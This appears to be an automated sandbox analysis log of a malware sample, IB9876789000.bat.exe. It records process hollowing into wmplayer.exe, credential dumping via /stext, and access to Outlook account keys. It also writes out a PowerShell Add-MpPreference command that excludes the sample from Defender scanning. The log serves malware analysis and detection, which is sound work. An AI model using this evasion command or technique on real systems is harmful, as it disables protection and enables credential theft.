Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vw4nikdb.iie.ps1Jump to behavior
                    Source: IB9876789000.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: IB9876789000.bat.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: wmplayer.exe, wmplayer.exe, 0000000E.00000002.2193872927.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: wmplayer.exe, 0000000D.00000002.2211542921.0000000005300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: IB9876789000.bat.exeReversingLabs: Detection: 42%
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile read: C:\Users\user\Desktop\IB9876789000.bat.exeJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\IB9876789000.bat.exe "C:\Users\user\Desktop\IB9876789000.bat.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winmm.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: urlmon.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: iertutil.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: srvcli.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: netutils.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winhttp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: pstorec.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: vaultcli.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wintypes.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dpapi.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: pstorec.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: IB9876789000.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: IB9876789000.bat.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb0 source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbh source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress 6_2_0041BCE3
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe Code function: 0_2_00007FF848B6D5F1 push es; ret 0_2_00007FF848B6D60A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe Code function: 0_2_00007FF848B67563 push ebx; iretd 0_2_00007FF848B6756A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe Code function: 0_2_00007FF848B6E478 push cs; ret 0_2_00007FF848B6E47A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe Code function: 0_2_00007FF848C4026B push esp; retf 4810h 0_2_00007FF848C40312
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_004567E0 push eax; ret 6_2_004567FE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0045B9DD push esi; ret 6_2_0045B9E6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00455EAF push ecx; ret 6_2_00455EC2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00433FF6 push ecx; ret 6_2_00434009
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_10002806 push ecx; ret 6_2_10002819
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 14_2_00451D34 push eax; ret 14_2_00451D41
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00406128 ShellExecuteW,URLDownloadToFileW 6_2_00406128
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle 6_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress 6_2_0041BCE3
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

